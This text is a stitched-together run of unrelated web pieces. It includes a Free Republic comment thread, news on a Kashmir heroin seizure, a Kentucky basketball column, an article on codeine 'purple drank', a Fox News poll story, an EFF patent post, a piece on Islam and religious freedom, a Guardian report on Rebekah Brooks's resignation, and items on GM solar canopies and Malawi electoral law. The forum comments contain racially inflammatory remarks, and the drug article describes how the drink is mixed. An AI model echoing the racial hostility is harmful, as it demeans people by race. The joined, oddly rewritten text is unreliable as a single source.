by 13 posted onby dragnet2 (Diversion and evasion are tools of deceit)
To: doug from upland
“How do you like that, white libs/leftists?” they'll lap it up. and if by some miracle they end up not liking their submissive status, they'll blame the Tea Party and Palin.
To: Altura Ct.
Guideline #9: If you're white and black persons continue to beat you, remain calm, smile and give them your cell phone, shoes, coat and offer any currency you might have.
by 15 posted onby dragnet2 (Diversion and evasion are tools of deceit)
To: Altura Ct.
Just wow. Can you imagine the outrage if the races were reversed in the statement?? Obama's Amerika is SO MUCH WORSE for race relations than ever before! The Libs OWN this divisiveness.
by 16 posted onby originalbuckeye (Moderation in temper is always a virtue; moderation in principle is always a vice. Paine)
To: Altura Ct.
Should white people ride at the back of the bus on the way there?
by 17 posted onby Lurker (Violence is rarely the answer. But when it is the only answer.)
To: Altura Ct.
And....the self-loathing whites will line up to be abused. Meanwhile....all the time cursing conservatives as if we are Nazis.
To: dragnet2
To: Altura Ct.
Rules for Bob Beckel wannabees.
Disclaimer: Opinions posted on Free Republic are those of the individual posters and do not necessarily represent the opinion of Free Republic or its management. All materials posted herein are protected by copyright law and the exemption for fair use of copyrighted works.
FreeRepublic , LLC, PO BOX 9771, FRESNO, CA 93794
FreeRepublic.com is powered by software copyright 2000-2008 John Robinson
In a major drug bust, the Baramulla Police today seized 66.5 kilograms of suspected heroin worth Rs 300 crore from a truck that originated from Pakistan-occupied Kashmir.
The truck was purportedly carrying boxes full of garments, but hidden among the boxes were packets of narcotics.
The truck, numbered AJK XA-267, originated from Muzzaffarabad in Pakistan-occupied Kashmir and was headed towards Uri in Kashmir. Officials posted at the LoC Trade Centre in Salamabad, Uri, who were already on the lookout for such a truck after receiving intelligence inputs about the movement of drugs, stopped the lorry and carried out a search, which led to the recovery of the narcotics.
The driver of the truck - a PoK man named Syed Yousuf - has been arrested, but officials believe they are just a small-time operative. A case has registered under various sections of the Narcotic Drugs and Psychotropic Substance Act (NDPSA).
Two men - a fabric business person and their relative - are believed to be responsible for the drug consignment. They have been identified and are being tracked, Baramulla SSP Imtiyaz Hussaid said.
ONE OF THE BIGGEST HAULS
Today's drug haul is one of the biggest in Jammu and Kashmir. The state's biggest ever drug was in 2014 when over 100 kilograms of brown sugar was seized. The 2014 consignment too came from PoK.
Cross LoC trade at the Chakoti-Uri section has been under radar of intelligence and security agencies for a while now. Agencies are also concerned at that LoC trade routes are being used to by terror associates to route Fake Indian Currency Notes (FICNs) into India.
In March, the Jammu and Kashmir police also busted an arms consignment, arrested a truck driver who was transporting pistols, grenades and assorted ammunition from across the PoK. The arms, police said, were meant for terrorists in south Kashmir.
ALSO READ | Drugs found in Air India food trolley, insider's role suspected
ALSO READ | Hyderabad: Drug racket haul reveals city school children major consumers
echo do_shortcode('[quads id=1]'); ?
John Calipari reacts to a play during the Wildcats 86-67 win vs. Fort Wayne on Wednesday, November 22, 2017, at Rupp Arena in Lexington, Ky. (Photo by Chet White, courtesy of UK Athletics).
When John Calipari first arrived at Kentucky with their one and done philosophy, fans were excited to see the talent that would roll through the program on a yearly basis. Fast forward eight years later and fans are expressing that they are tired of roster turnover from year to year, claiming unfamiliarity with current players to be the biggest reason.
There is no doubt that Calipari is one of the best coaches in the country and they have the track record to prove it. The Hall of Fame coach has guided three programs to a Final Four (UMass, Memphis, and Kentucky) and led the Wildcats to a 2012 NCAA Championship. Overall, Calipari owns a record of 258-55 at Kentucky and in addition to their one championship; they have led the Wildcats to a total of four Final Fours (2011, 2012, 2014, 2015) in eight seasons.
Despite the success, fans most often point to the shortcomings of the Calipari era. Fans can forgive the 2011 loss to UConn because that Kentucky team overachieved to get to the Final Four. Kentucky lost again in the 2014 NCAA title game to UConn but the truth is this, the 2015 season is what leaves the bitter taste in the mouths of fans.
Make no mistakes about it, the 2014-2015 Kentucky Wildcats were a special group and they should forever be praised for it. Calipari had so much talent on one team that they were forced to use two platoons in order for everyone to see action. However, everyone knows the result, as a perfect season came to an end with a loss to Wisconsin in the Final Four, only to allow Duke and Coach K's crop of one and done freshmen to claim the programs fifth NCAA title.
I don't buy into the claim that the disappointment from football season has carried over to basketball because if that were the case, Kentucky fans would have been upset for years. I do; however, think that a national championship loss in 2014 coupled with a near-perfect season in 2015 has led to frustration. On another note, Calipari pumped the brakes about this year's team in September and October, explaining that they were way behind and that it will be a struggle. In a sense of trying to warn the fans about expectations, they might have killed the idea that this team can compete by seasons end.
As far as their legacy at Kentucky goes, that book is still being written. It's difficult to judge an overall story when you haven't read the entire book. As long as Calipari is the coach at Kentucky, the Wildcats will be considered one of the favorites to hoist the hardware on college basketballs final Monday each season but you get the feeling that they need a second championship for fans to deem their NBA pipeline a successful time for the program.
Coach K and Roy Williams are the only two current coaches to have more than one NCAA title for a reason. It's difficult to win one and there is no guarantee that you will get back there. With one title under their belt, Calipari is tied with Joe B. Hall, Rick Pitino, and Tubby Smith for the second most in UK history. If they find a way to win one more to become just the second coach in UK history to win multiple titles (Adolph Rupp 4), then even the biggest critics will be silenced.
As a fan, you have to have confidence that this year's group will be one of the best teams in the country by March because more often than not, that has been the case. Yet, large majorities of people say that they are disinterested in this team and even attendance would back that up. Outside of Wenyen Gabriel, Sacha Killeya-Jones, and Tai Wynyard, Kentucky has an entirely new group of scholarship players this season and those three didn't play much last season, which didn't allow fans to get a feel for them.
I will leave it at this. Would you feel that way if Kentucky were winning NCAA titles more frequently with freshmen? The good news is this group has multiple guys that should return next season so there should be some familiar faces on the roster.
The prescription-strength cough syrup used in purple drank contains codeine and promethazine (not to be confused with dextromethorphan ; DXM ). Promethazine induces a liver enzyme(CYPD26, similar to what Glutethimide did) that makes codeine much stronger than it alone. [2] The cough syrup, used in doses much higher than medically recommended, is typically mixed with ingredients such as the soft drinks Sprite , Mountain Dew or Grape Fanta and optionally "a Jolly Rancher hard fruit candy thrown in for extra sweetness." [1] The purplish hue of purple drank comes from dyes in the cough syrup. The amount of cough syrup used "can exceed up to 25 times the recommended dose." [3] The concoction is "typically consumed out of Styrofoam cups". [3]
The addictive nature of the drink means that trying to discontinue regular usage can bring about symptoms of withdrawal. [10] In a 2008 interview with MTV News , Lil Wayne described the withdrawal as feeling "like death in your stomach when you stop. Everybody wants me to stop all this and all that. It ain't that easy." [11]
Dangers arise in higher dosages because promethazine is a depressant of the central nervous system and codeine is a respiratory depressant. When codeine is taken in very large amounts, it can cause one to stop breathing. [10] Using alcohol and other drugs alongside purple drank increases the chance of problems. [10] Fallieras stated that the concoction does not cause seizures itself but increases their likelihood in those susceptible to them. [10] The drink includes a "massive" amount of the opiate codeine, which can be addictive in high doses, and Fallieras states that "promethazine has at least anecdotally been noted to intensify the euphoric effects of codeine in the brain." [10]
In an article following the hospitalization of the rapper Lil Wayne alleged to be related to purple drank, the Los Angeles Times spoke to physician and hospitalist Dr. George Fallieras, on the hazards of the concoction. Fallieras stated that in its intended usage, "The codeine in the medicine serves as a pain reliever and also suppresses coughing. A second drug in the cough syrup, known as promethazine, is used as an antihistamine and commonly used to treat motion sickness and nausea. It is also a bit of a sedative—employed partly to keep people from drinking too much of the stuff. This is a very common cough syrup that, when taken in appropriately prescribed quantities, is quite safe." [10]
The physiological effects of purple drank on the user is to produce mild "euphoric side effects", which are accompanied by "motor-skill impairment, lethargy, drowsiness, and a dissociative feeling from all other parts of the body". [3] Houston author Lance Scott Walker noted that the super-sweet combination of soda, cough syrup, and Jolly Ranchers provides a flavor and mouthfeel which stays on the tongue for an extended duration. This phenomenon is often appealing to first-time users. [9] Purple drank is often used in combination with alcohol and/or other drugs. [3] Promethazine induces a liver enzyme that makes codeine much stronger than on its own, somewhat like the Glutethimide (Doriden) and codeine combination that was popular on the streets from the seventies up to the early nineties when Glutethimide was discontinued by manufacturers. A number of deaths have been attributed to this combination. [ citation needed ]
According to Houston-based author Lance Scott Walker, purple drank developed in that city around the 1960s when blues musicians would take Robitussin and cut it with beer. Later when wine coolers came onto the market, they substituted for beer.[9] These blues musicians lived in Houston's Fifth Ward, Third Ward, and South Park neighborhoods and the practice was taken up by the generation of rappers growing up in the same parts of the city.[9] In the 1980s and 1990s the formula changed to using codeine promethazine cough syrup, somewhat like the Glutethimide and codeine combination that was popular in the eighties and early nineties. .[9]
Professor Ronald Peters, also a Houston resident, points out that purple drank remained a local Houston phenomenon until the 1990s rapper DJ Screw released several tunes mentioning the drink in their mixtapes which were extremely popular in the Houston area.[9]
Walker holds that DJ Screw's music was particularly appropriate for Houston's climate. Due to the heat and expanse of the Houston area residents spent long drives in their cars, "the music that most appropriately complements that has always been the music of DJ Screw, it's slowed down – and when I say slowed down I mean they would record sessions in their apartment with rappers freestyling over beats and they would make these big mixtapes and then they would actually slow them down even further on their cassette recorder."[9] DJ Screw's invoking purple drank in their lyrics and their use of slow tempos had caused their style to be characterized "[a]s if the song itself has taken too much codeine promethazine".[9] Rappers outside of Houston soon adopted aspects of their style.[9]
Walker points out that purple drank had never been stigmatized in Houston, but with the apparent purple drank related early death of DJ Screw, the concoction became the focus of law enforcement in the Houston area with felony charges being applied for some aspects surrounding it.[9]
Popularization
Houston producer DJ Screw popularized the concoction, which is widely attributed as a source of inspiration for the "chopped and screwed" style of hip hop music.[12][13] The promethazine and codeine concoction first gained popularity in the underground rap scene in Houston,[13] where musician Big Hawk said it was consumed as early as the 1960s and 1970s, becoming more widely used in the early 1990s.[14] Because of usage by rap artists in Houston, it became more popular in the 1990s.[15] Its use later spread to other southern states.[12]
In June 2000, Three 6 Mafia's single "Sippin' on Some Syrup", featuring UGK, brought the term "purple drank" to a nationwide audience.[16]
In 2004, the University of Texas found that 8.3% of secondary school students in Texas had taken codeine syrup to get high.[12] The Drug Enforcement Administration reports "busts" involving syrup across the southern United States, particularly in Texas and Florida.[12]
As of 2011, the price of purple drank in Houston is twice the price as it is in Los Angeles.[15]
Deaths from use
Purple drank is confirmed or suspected to have caused the deaths of several prominent users. Respiratory depression is a potentially serious or fatal adverse drug reaction associated with the use of codeine, but mainly the danger lies in the much more potent and CNS-depressing phenothiazine-related antihistamine promethazine. This depression is dose-related and is the mechanism for the potentially fatal consequences of overdose: respiratory or cardiac arrest. As with most CNS depressants, mixing with alcohol greatly increases the risk of respiratory failure and other complications.[17]
DJ Screw, who popularized the codeine-based drink, died of a codeine-promethazine-alcohol overdose on November 16, 2000, several months after the video to Three 6 Mafia's single debuted.[18]
Big Moe, a DJ Screw protégé whose albums City of Syrup and Purple World were based on the drink and who has been described as having "rapped obsessively about the drug",[19] died at age 33 on October 14, 2007, after suffering a heart attack one week earlier that left them in a coma.[20] There was speculation that purple drank may have contributed to their death.[21][22]
Pimp C, widely influential Port Arthur, Texas rapper and a member of rap duo UGK, was found dead on December 4, 2007, at the Mondrian Hotel in West Hollywood, California. The Los Angeles County Coroner's Office reported that the rapper's death was "due to promethazine/codeine effects and other unestablished factors". Ed Winter, assistant chief of the Coroner's Office, said the levels of the medication were elevated, but not enough to deem the death an overdose. However, Pimp C had a history of sleep apnea, a condition that causes one to stop breathing for short periods during sleep. A spokesperson for the coroner's office said that the combination of sleep apnea and cough medication probably suppressed Pimp C's breathing long enough to bring on their death.[23][19]
Fredo Santana, an American rapper who frequently made references to the drink in their music, died of a fatal seizure on January 19, 2018. According to TMZ, they had been suffering from liver and kidney problems, which were believed to be the result of their addiction.[24]
Other incidents
In September 2006, Terrence Kiel, a San Diego Chargers player, was arrested during practice for the possession with intent to sell prescription cough syrup for use in making the drink.[12] Kiel was caught trying to ship a case of syrup to a friend via FedEx. Kiel was charged with two felony counts of transporting a controlled substance and three counts of possession for sale of a controlled substance.[25]
On July 8, 2008, Johnny Jolly, a Green Bay Packers player, was pulled over in their car for playing an excessive level of music in a nightclub parking lot. The officers found a Dr Pepper bottle in a holder next to two Styrofoam cups containing soda and ice. The officers said the cups and the bottle all emitted "strong odors of codeine"[26] even though the codeine is odorless according to National Institutes of Health.[27] The case was dismissed,[28] but charges were refiled in December 2009 after the Houston Police Department acquired new equipment that allowed the police to test the evidence again. Jolly faced a possible maximum sentence of up to 20 years in jail, but as a first time offender they would be eligible for probation.[29]
On July 5, 2010, former Oakland Raiders quarterback JaMarcus Russell was arrested at their home in Mobile, Alabama, for possession of codeine syrup without a prescription. They were arrested as part of an undercover narcotics investigation. Russell was booked into city jail and released soon afterwards after making their bail.[30]
On March 15, 2013, Lil Wayne was hospitalized with seizures allegedly after taking the drug[31] Fellow rapper Birdman, however denied that the seizures were in any way connected to drugs. [32]
On June 11, 2013, just days after being robbed at gunpoint in San Francisco, rapper 2 Chainz was arrested at Los Angeles International Airport on charges of possessing promethazine and codeine (the primary ingredients of purple drank) along with marijuana.[33]
President Donald Trump waves as they prepare to board Air Force One for a trip to Dallas, Wednesday, Oct. 25, 2017, at Andrews Air Force Base, Md. (AP Photo/Evan Vucci)
Was it the tweet storms or the hurricanes? Something hit President Trump's numbers. Their personal ratings have deteriorated and their job approval has hit a low.
Continue Reading Below
Thirty-eight percent of voters approve of the job Trump is doing in a new Fox News poll, down from 42 percent last month. At the same time, disapproval is up 4 points to a high of 57 percent. That includes 49 percent who “strongly” disapprove.
Some of the drop comes from white men without a college degree, as 56 percent approve of the president, down from 68 percent last month. Working-class white men were a key voting bloc for them in the election (71 percent backed Trump according to the Fox News Exit Poll).
Also, their approval among white evangelical Christians went from 74 percent last month to 66 percent now. Eighty percent backed them in the election.
Approval among independents fell to 30 percent (46 percent of independents voted for Trump).
Continue Reading Below
Republican support held steady at 83 percent approval.
John Kelly bests their boss: 42 percent approve of the job the White House chief of staff is doing, while 30 percent disapprove. Twenty-nine percent of voters are unable to rate him, including 25 percent of Republicans. Fewer Republicans approve of Kelly (69 percent) than Trump (83 percent). Yet more than three times as many Democrats approve of Kelly (24 vs. 7 percent).
Thirty-three percent think Trump is honest and trustworthy, though that's hardly changed from just before the election when 35 percent felt that way (November 2016).
Roughly 4-in-10 think Trump has the knowledge (38 percent), compassion (37 percent), and judgment (37 percent) to serve effectively as president.
A similar 38 percent believe Trump “cares about people like me,” while 6-in-10 disagree (60 percent). Those most likely to feel they don't care include non-whites (79 percent), women (68 percent), voters under age 45 (68 percent), and lower-income voters (67 percent).
Trump's favorability stands at 39 percent. That's down from 44 percent in August, and a high of 47 percent in June. Their unfavorable number is 59 percent.
Voters are more favorable toward Melania Trump than their husband, but their numbers have taken a hit too. She's at 45 percent favorable and 34 percent unfavorable. It was 51-28 percent in June.
The White House receives mixed marks for its response to recent disasters. Voters give net positive ratings for the response to the hurricanes that hit Houston (+7 points) and Florida (+2), but sharply negative ratings to how it responded to the Puerto Rico hurricane (-32), mass shooting in Las Vegas (-23), and the California wildfires (-21).
Meanwhile, 60 percent disapprove of how Trump's handling health care. One third approves (33 percent). At a net negative 27, that makes health care their worst issue rating. They perform better -- but is still underwater -- on North Korea (-24 points), Iran (-21), taxes (-14), and the economy (-5).
President Obama's signature law remains divisive. Twenty-five percent would repeal the health care law entirely (near the low of 23 percent wanting repeal), while another 31 percent would repeal parts of the law. On the other hand, a record 29 percent would expand it, and 13 percent would leave it as is.
When asked to look ahead 10 years, most voters expect at least some of the law will be changed: 21 percent expect it to be repealed entirely, up from 16 percent in 2015. Nearly half, 47 percent, say parts will be repealed. Fewer than one in four thinks it will be either expanded (14 percent) or left alone (9 percent).
What happens with health care carries more risk than reward for Republicans. The poll shows about the same number would credit Obama or the Democrats in Congress (37 percent) as Trump or the Republicans (33 percent) if the health insurance system improves. If the system gets worse, however, twice as many would blame Trump or the GOP (48 percent) as Democrats or Obama (22 percent).
In addition, a record 54 percent of voters have a favorable opinion of ObamaCare. Forty-two percent view it negatively.
Pollpourri
Voters like their past presidents more than their current one: 63 percent have a favorable opinion of Obama, and 59 percent view George W. Bush positively.
Among Trump voters, the president receives their largest negative rating on trust, as 14 percent say they are dishonest. Sen. Bob Corker (R-TN), themselves once a Trump supporter, tweeted about the president's dishonesty Tuesday, “Same untruths from an utterly untruthful president.” That was in response to the president tweeting, in part, that Coker had decided against running for reelection “when I refused to endorse him.”
Overall, 57 percent of voters disapprove of Trump's tweets, while 30 percent “wish he'd be more cautious.” Only 11 percent approve. Even Trump voters aren't as enamored as they once were: 25 percent approve of their tweeting, down from 35 percent in March.
The Fox News poll is based on landline and cellphone interviews with 1,005 randomly chosen registered voters nationwide and was conducted under the joint direction of Anderson Robbins Research (D) and Shaw & Company Research (R) from October 22-24, 2017. The poll has a margin of sampling error of plus or minus three percentage points for all registered voters.
The patent system is broken. We've been talking about it for years, and we just rolled out a new site (defendinnovation.org) to do something about it, where we hope you'll join us in coming up with solutions that make sense for innovation.
Now we've got some new developments that further prove just how flawed the modern software patent system is:
First, today we saw a new report confirming what we already knew: patent trolls are costing the economy serious money (to the tune of $29 billion in 2011 alone!) and they disproportionately harm small businesses. The paper, by James Bessen and Michael Meurer (who also wrote the important book, Patent Failure), combs through the data and concludes:
The rapid growth and high cost of NPE [non-practicing entities, or trolls] litigation documented here should set off an alarm warning policymakers that the patent system still significant reform to make it a truly effective system for promoting innovation.
The paper drew some dire conclusions about the cost of troll suits, such as:
Trolls bring suits involving software patents 62 percent of the time; when those suits involve patents that have been litigated more than once, they concern software 94 percent of the time.
When trolls sue, small companies pay more in direct litigation costs than their larger counterparts.
Defendants' costs are more than just for lawyers and litigation, they include "diversion of management or engineering resources, delays in new product introductions and improvements, loss or delay of revenue, and credit constraints."
The threat of troll litigation causes companies to reduce their R&D budgets in order to afford high legal costs.
Perhaps most troubling, the paper points out that trolls "may skew the research agenda of small firms away from disruptive technologies and toward mainstream technology and associated patents that can be asserted against big incumbents. Even worse, small firms are encouraged to divert investment from genuine invention toward simply obtaining broad and vague patents that might one day lead to a credible, if weak, lawsuit."
Last week also saw an important ruling from Judge Richard Posner in a case between Apple and Motorola. The case started as a run-of-the-mill patent mess between the two parties, but Judge Posner used the opportunity to express some of their displeasure with the patent system (the influential judge had already publicly spoken out against the patent system and called it "chaos" during the hearings). After more than a year of litigation, Judge Posner threw the parties out of court, essentially faulting them for not being able to show how each was damaged by the other's alleged patent infringement.
This case highlights some of the worst problems we've seen in litigation concerning software patents. The first is a patent owner's attempts to extract millions of dollars in damages or shut down entire products for infringing only one patent that covers a mere fraction of the defendant's product (check out proposal #6 at defendinnovation.org). In admonishing Apple, Judge Posner rightly pointed out that not only is this practice absurd, but it can harm consumers who rely on the products at issue.
The second important issue involves a party's ability to enforce its patents that cover industry standards. Here, Motorola asserted that Apple infringed a patent that covered communications between cell phones and cell towers (no, we're not kidding, and yes, that would cover almost every cell phone). Because this is what's called a "standard essential patent," Motorola agreed to license it on "fair, reasonable, and nondiscriminatory terms" (FRAND) to anyone who needs to use it. In other words, Motorola cannot use its patent to stop other cell phone companies from selling phones that actually make calls (so long as those companies are willing to pay for a "reasonable" license). Frankly, it would be better if this technology were free to all, but, given the current state of affairs, we're at least glad to see Judge Posner reaffirm this important principle.
The Bessen and Meurer paper and Judge Posner's ruling provide further evidence of what we already know: the patent system needs serious help. Software patents—and the cottage industry of litigation and licensing surrounding them—have created an environment that threatens businesses, consumers, and, worst of all, innovation. We're glad to see more sanity in the debate as people talk about what the real problems are and what we can do to fix them—whether it be implementing the proposals at defendinnovation.org or even abolishing software patents altogether. We hope you'll join the conversation at defendinnovation.org and tell us what you think, too.
Donald Trump's call to bar all Muslims from entering the country was widely recognized as an appeal for explicit religious discrimination and generated significant pushback. But many of Trump's right-wing defenders have turned to an argument that has long bounced around Religious Right circles: that Muslims are not entitled to the religious liberty protections of the First Amendment because Islam is somehow not a religion. A few years ago, for example, retired Lt. Gen Jerry Boykin called Islam “a totalitarian way of life” that “should not be protected under the First Amendment.”
At this week's Republican presidential debate, Rick Santorum explained why they believe Islam is not protected under the First Amendment, an argument made repeatedly by the American Family Association's Bryan Fischer. Here's Santorum:
The fact of the matter is, Islam is different. I know this is going to come as a shock to a lot of people, and I mean this sincerely. Islam is not just a religion. It is also a political governing structure. The fact of the matter is, Islam is a religion, but it is also Sharia law, it is also a civil government, it is also a form of government. And, so, the idea that that is protected under the First Amendment is wrong.
Conservative columnist and radio host Andrew McCarthy has similarly defended Trump's comments, saying that Islam is not merely a religion because it “has ambitions to be more than a religion, that is to say that it is an ideological, sweeping system that does not recognize a division between spiritual life on the one hand and political and civic life on the other.”
Back in September, Family Research Council's Tony Perkins defended similar comments by Ben Carson:
“Religious freedom and our liberty is ordered liberty under the Constitution,” Perkins said. “And as Dr. Caron pointed out, and I know this is driving the left crazy, that Islam is not just a religion, Islam is an economic system, it is a judicial system, it is a compressive system which is incompatible with the Constitution. That's what Dr. Carson said and they happen to be correct.”
More recently, Perkins defended Trump with a dubiously specific statistic, saying that “only 16 percent of Islam is a religion — the rest is a combination of military, judicial, economic and political system.” Televangelist Pat Robertson also said this month that people should not view Islam as a religion but rather a “political system masquerading as a religion.”
Wait a minute. Aren't these the same people who repeatedly insist that the Bible is the final authority on everything, from laws regulating personal relationships to economic and tax policy, and environmental protection? Anti-marriage-equality activists have insisted that the Supreme Court's marriage equality ruling was in violation of “God's law” and therefore “illegitimate.”
David Barton, an oft-discredited “historian” and Republican Party activist who is currently heading up a Ted Cruz super PAC, argues that the Bible opposes minimum wage laws, estate taxes, capital gains taxes, any progressive form of taxation and even net neutrality. They say the Constitution came right out of the Bible. If you applied Tony Perkins' calculations to David Barton's Bible, what percentage would come up as religion?
Many Religious Right leaders have embraced Seven Mountains dominionism, which is grounded in the belief that the right kind of Bible-believing Christians are meant to control all the important spheres of culture, including government, business, education, and entertainment. For example, the American Pastors Network's Sam Rohrer says this:
Government leaders are charged with wielding the Word of God as an instrument of Justice, promoting God's moral law as the foundation of right and wrong, encouraging those who do well biblically, and executing judgment on those who break the law.
Along those lines, three Republican presidential candidates, including current Iowa frontrunner Ted Cruz, recently joined a “religious freedom” rally organized by a pastor who argues that the Bible requires the government to execute gay people.
And don't forget David Lane, whose American Renewal Project is mobilizing conservative pastors to get more involved in politics — and who argues that America was founded for the glory of God and the advancement of the Christian faith, and that the Bible should be a primary textbook in public schools.
So, a thought for Religious Right leaders: If you are going to argue for stripping Muslims of their First Amendment religious liberty protections based on your interpretation of Islam as an enterprise that is more political and ideological than religious, you may have to trim your own political sails quite a bit. Either that, or quit pretending you are proponents of religious freedom, and admit that you, like Bryan Fischer, believe the First Amendment applies only to Christians, or, like Tony Perkins, that gay-supporting Christians don't deserve the same legal protections because a “true religious freedom” has to “come forth from religious orthodoxy.” Just don't try to pretend your definition of “religious freedom” owes anything to Thomas Jefferson or the First Amendment.
News International chief stops short of full apology, saying they no longer wants to be 'focal point of the debate'
Rebekah Brooks, the News International chief executive, has resigned after 11 days of mounting political pressure over the phone-hacking scandal.
Brooks announced their decision to News International staff in Wapping just before 10am on Friday, saying their resignation had been accepted by Rupert and James Murdoch. They said they no longer wanted to be a "focal point of the debate" surrounding the company's future and reputation.
They stopped short of issuing a personal apology. "As chief executive of the company, I feel a deep sense of responsibility for the people we have hurt and I want to reiterate how sorry I am for what we now know to have taken place," Brooks said in a statement.
"I have believed that the right and responsible action has been to lead us through the heat of the crisis. However my desire to remain on the bridge has made me a focal point of the debate.
"This is now detracting attention from all our honest endeavours to fix the problems of the past."
Brooks praised Rupert and James Murdoch and said they leaf "with the happiest memories and an abundance of friends".
Brooks is to be replaced by the chief executive of Sky Italia, Tom Mockridge, who will take over at Wapping immediately.
It is not yet clear exactly why Brooks's resignation after 22 years at the company was accepted by the Murdochs, who had so far steadfastly stood by them during the crisis. This despite calls for them to go from the leaders of all the main political parties, including the prime minister, David Cameron, and the family of murdered schoolgirl Milly Dowler, whose mobile phone was allegedly hacked by a private investigator working for the News of the World.
However, the last straw may have been Thursday night's Newsnight interview with News International parent company News Corporation's second largest shareholder, Saudi prince Al-Waleed bin Talal Alsaud, in which they said that if there was evidence of Brooks's "explicit" involvement in the alleged illegal activity, "for sure they have to go, you bet they have to go".
Brooks also faced an uncomfortable appearance before MPs on the Commons culture, media and sport select committee on Tuesday along with Rupert and James Murdoch to answer questions about the phone-hacking scandal. In their resignation statement they indicated that they would still appear before the committee.
In their statement Brooks said they wanted to clear their name as well as the company's. "The reputation of the company we love so much, as well as the press freedoms we value so highly, are all at risk," they added.
"As you can imagine recent times have been tough. I now need to concentrate on correcting the distortions and rebutting the allegations about my record as a journalist, an editor and executive.
"My resignation makes it possible for me to have the freedom and the time to give my full co-operation to all the current and future inquiries, the police investigations and the CMS appearance. I am so grateful for all the messages of support. I have nothing but overwhelming respect for you and our millions of readers."
James Murdoch, who has management responsibility for News International as News Corp's deputy chief operating officer, said in a memo to Wapping staff that Brooks had been "one of the outstanding editors of their generation" who could be "proud of many accomplishments as an executive". "We support them as they take this step to clear their name," they added.
Murdoch welcomed the appointment of Mockridge as Brooks's successor, saying they were "in London today and will start right away".
"Tom is a highly respected and accomplished media executive who has served as CEO of Sky Italia since its launch in 2003," they added. "Tom, who has also been in charge of our European television business, started their career as a newspaper journalist in New Zealand and they have held a range of top roles in the newspaper industry."
Murdoch also confirmed that News International would run full-page ads in the national press at the weekend apologising for the phone-hacking scandal, as reported by the Guardian on Thursday.
"We will apologise to the nation for what has happened. We will follow this up in the future with communications about the actions we have taken to address the wrongdoing that occurred. We are also sending letters to our commercial partners with an update on the actions we are taking," they said.
"The company has made mistakes. It is not only receiving appropriate scrutiny, but is also responding to unfair attacks by setting the record straight."
Alsaud, known as the "Arab Warren Buffet" and the nephew of the Saudi king, also told Newsnight: "If the indications are that their involvement in this matter is explicit ... for sure they have to go, you bet they have to go. Ethics to me is very important. I will not tolerate dealing with a company that has a lady or a man that has any sliver of doubts on them or their integrity. From my dealings with Mr James Murdoch and Rupert Murdoch it's almost impossible for James and Rupert to know what's going on at News of the World level.
"The problems have been at the News of the World newspaper and not at News Corp level. I'd like to differentiate between News Corporation conglomerate and the News of the World that got shut down. These tactics used by tabloid newspapers in the UK were done not only by News of the World but by other tabloid newspapers also.
"I hope that this matter doesn't get over-politicised. Clearly some politicians in the UK and US right now would like to set the record clear and take revenge on Mr Murdoch's conglomerate that wasn't really on their side some time ago."
Pressure has intensified on 43-year-old Brooks to stand down since the hacking scandal re-erupted following the Guardian's disclosure on 4 July that private investigator Glenn Mulcaire, working for the News of the World, allegedly hacked into Dowler's mobile phone between their disappearance and the discovery of their body in 2002.
The public revulsion over the revelation and subsequent allegations that the families of British soldiers killed in Afghanistan and Iraq and the victims of the 7/7 terrorist attacks may have been targeted led to the decision last week by News Corporation to close the News of the World.
However, as the scandal snowballed Brooks stood firm and showed no sign of buckling under the pressure. They told News International staff that it was "inconceivable" that they knew about the hacking of Dowler's phone.
Brooks also faced down the anger of News of the World staff in two separate meetings with them last week amid claims that their paper and their jobs were being sacrificed to save them
They also appeared to have been protected by Rupert Murdoch, who is said to fondly regard them almost as a fifth daughter.
Until Friday morning's announcement, this support even appeared to withstand cross-party calls for them to step down. They had also been cast adrift by Cameron, formerly part of the same Oxfordshire social circle. They said last week: "It has been reported that they offered their resignation over this and in this situation I would have taken it."
This time it has. Cameron's official spokesperson said today their resignation was "the right decision".
The Labour leader, Ed Miliband, had described Brooks's ongoing employment at News International as an "insult" to the Dowler family. They wrote today on Twitter: "It is right that Rebekah Brooks has finally taken responsibility and resigned" and called on Rupert Murdoch to apologise to the Dowlers.
• To contact the MediaGuardian news desk email editor@mediatheguardian.com or phone 020 3353 3857. For all other inquiries please call the main Guardian switchboard on 020 3353 2000. If you are writing a comment for publication, please mark clearly "for publication".
• To get the latest media news to your desktop or mobile, follow MediaGuardian on Twitter and Facebook
Today GM announced the launch of a new nationwide program to install solar canopy charging stations at their Chevy dealerships across the country. Each canopy, called a Green Zone, will be capable of charging up to 4,500 electric vehicles (EV) batteries a year. With that much positive green energy running through the batteries of their not-yet sold Chevy Volts, GM should have no problem selling off their increased production run of the award winning plug-in hybrid electric vehicle.
The first two dealerships to complete Green Zone construction are American Chevrolet in Modesto, California, and Al Serra Auto Plaza in Grand Blanc, Michigan. “The question isn't whether to install a solar canopy, it's where and how many,” said Joe Serra, president of Serra Automotive. “It's a win for us because the electricity generated will help reduce operating costs, and it's a win for the environment since solar power helps reduce our carbon footprint.” The cost for each solar canopy comes free to the dealership and is part of GM Ventures' recent announcement to invest $7.5 million in Sunlogics, a solar technology company that will be manufacturing the solar panels for the company and installing the canopies on dealership property.
GM announced in May that they had installed a solar canopy charging station at their Detroit-Hamtramck assembly plant, where all Volts are made, to charge the vehicles after they head out to dealerships. The new Green Zone initiative will take the Volt's emission-free charging one step further and shows GM's commitment to the future of green transportation. Each canopy provides enough electricity to power three homes yearly and all excess energy not used to power Volt batteries will be used to supplement the dealerships power needs.
Malawi Law Commission has endorsed the merit of shifting to a 50-plus-one system from the current electoral system for presidential elections, the plurality-based First Past the Post (FPTP) system, that will see the country receding from the winner-takes-it-all scenario of electing the Head of State.
Since 1994 the FPTP electoral system has been used for the selection of the country's President, members of Parliament (MPs) and ward councillors.
Under these rules, the candidate on the ballot who gets the most votes is duly elected.
But in a Report on the Review of the Electoral law to the Minister of Justice and Constitutional Affairs, the Commission has backed the introduction of 50-plus-one system.
The new system will mean that the winning president will have to amass at least 50+ percent threshold of the national vote.
Chairperson of the Special Law Commission Justice Anthony Kamanga says in the report seen by Nyasa Times that Parliament will have to amend Section 80 (2) of the Constitution and Section 96 (5) of the Parliamentary and Presidential Elections (PPE) Act to provide change of the electoral system from the current simple majority to the 50 plus one percent.
“The Commission, therefore, agreed that the 50 percent plus 1 system, with the possibility of a second round where the first rounds fail to produce a candidate that meets the required threshold would, in the circumstances, be the ideal option,” reads the report.
Kamanga said where no such majority is obtained by any presidential candidate in the first poll, a run-off “should be held in which two presidential candidates who obtained the highest and second highest number of valid votes cast should be the only candidates.”
